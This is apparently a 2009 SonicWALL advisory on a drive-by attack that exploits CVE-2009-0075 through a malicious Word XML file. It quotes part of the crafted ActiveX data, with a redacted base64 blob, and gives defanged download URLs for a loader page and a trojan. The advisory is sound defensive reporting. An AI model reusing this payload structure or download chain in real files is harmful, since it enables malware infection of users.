MS09-002 Exploit (Feb 18, 2009)
SonicWALL UTM Research Team has observed a new MS09-002 exploit being used in the wild in drive-by attacks.
This exploit involves a malicious Microsoft Word (.doc) document that uses XML format being delivered to the end user. The .doc has a file size of 3,871 bytes and attempts to exploit the Uninitialized Memory Corruption vulnerability (CVE-2009-0075) in Internet Explorer 7 patched by Microsoft in the MS09-002 patch release.
The malicious word document file contains the following specially crafted data bytes:
w:ocx w_data=”DATA:application/x-oleobject;BASE64,rv0krsYD0RGLdgCAx0TziQAAOAAAAGgAdAB0AHA (REMOVED) gAZQBuAGcAagBp AHQAagAuAGMAbwBtAC8AYgBiAHMALwBpAG0AYQBnAGUAcwA vAGEAbABpAHAAYQB5AC8AbQBtAC8A agBjAC8AagBjAC4AaAB0AG0AbAA= ” w_id=”DefaultOcxName” w_name=”DefaultOcxName” w_classid=”CLSID:AE24FDAE-03C6-11D1-8B76-0080C744F389″ w_w=”200″ w_h=”123″ wx_iPersistPropertyBag=”true”
When the end user opens the document file, it uses the Microsoft Scriptlet Component ActiveX control (CLSID:AE24FDAE-03C6-11D1-8B76-0080C744F389) to connect to following Malicious URL:
- hxxp://(REMOVED)/bbs/images/alipay/mm/jc/jc.html [detected as GAV: XMLhttpd.D (Exploit)]
jc.html file contains an obfuscated javascript code that further downloads a Trojan from following URL:
- hxxp://(REMOVED)/bbs/images/alipay/mm/jc/jc.exe [detected as GAV: Rincux_4 (Trojan)]
The exploit has very low detection and is also known as Exploit-MSWord.k trojan (McAfee). SonicWALL GAV detects this exploit as GAV: MSWord.K (Exploit)
